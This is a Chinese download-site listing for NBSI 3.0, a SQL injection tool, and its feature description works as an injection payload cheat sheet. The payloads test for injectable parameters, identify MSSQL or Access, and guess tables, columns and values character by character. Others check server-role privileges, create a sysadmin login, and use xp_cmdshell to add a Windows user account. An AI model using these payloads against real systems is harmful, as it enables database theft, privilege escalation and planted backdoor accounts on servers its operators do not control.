软件 | nbsi 3.0官方正式版 |
内容 |
软件简介
功能介绍1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 4.注入参数是字符 'and [查询条件] and ''=' 5.搜索时没过滤参数的 'and [查询条件] and '%25'=' 6.猜数据库 ;and (Select Count(*) from [数据库名])>0 7.猜字段 ;and (Select Count(字段名) from 数据库名)>0 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9.(1)猜字段的ascii值(access) ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (2)猜字段的ascii值(mssql) ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 10.测试权限结构(mssql) ;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- ;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));-- ;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));-- ;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));-- ;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));-- ;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));-- ;and 1=(SELECT IS_MEMBER('db_owner'));-- 11.添加mssql和系统的帐户 ;exec master.dbo.sp_addlogin username;-- ;exec master.dbo.sp_password null, username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add'
nbsi官方电脑端更新日志 |
标签 | nbsi,漏洞检测,检测工具 |
缩略图 | |
软件名称 | nbsi |
软件图标 | |
软件大小 | 4.07 MB |
发布时间 | 2019-10-04 |
软件平台 | 电脑版 |
软件语言 | 简体中文 |
软件授权 | 免费软件 |
操作系统 | WinXP/2000/vista/Win7/Win8/Win10 |
系统类型 | 支持32/64位 |
用户评分 | 5 |
软件版本 | 3.0官方正式版 |
官方网站 | |
官方网址 | |
软件截图 | |
软件总类 | 电脑软件 |
软件大类 | 电脑软件-电脑工具-杂类工具 |
软件小类 | 杂类工具 |
开发者 | |
主办单位名称 | |
ICP备案名 | |
备案号 | |
使用年龄 | |
下载链接 | ![]() |
攻略教程 | |
详细介绍 | |
操控设备 | |
隐私政策 | |
查看权限 | |
敏感权限获取说明 | |
软件类型 | |
安全警示 | 适度休息有益身心健康,请勿长期沉迷于使用电脑或刷手机。 |
随便看 |
|
传承兰台文化,共同保存历史记忆!兰台网收藏软件、游戏、图片、图书、电影、电视剧等互联网档案,是免费和可借阅文本、电影、音乐等档案的数字图书馆。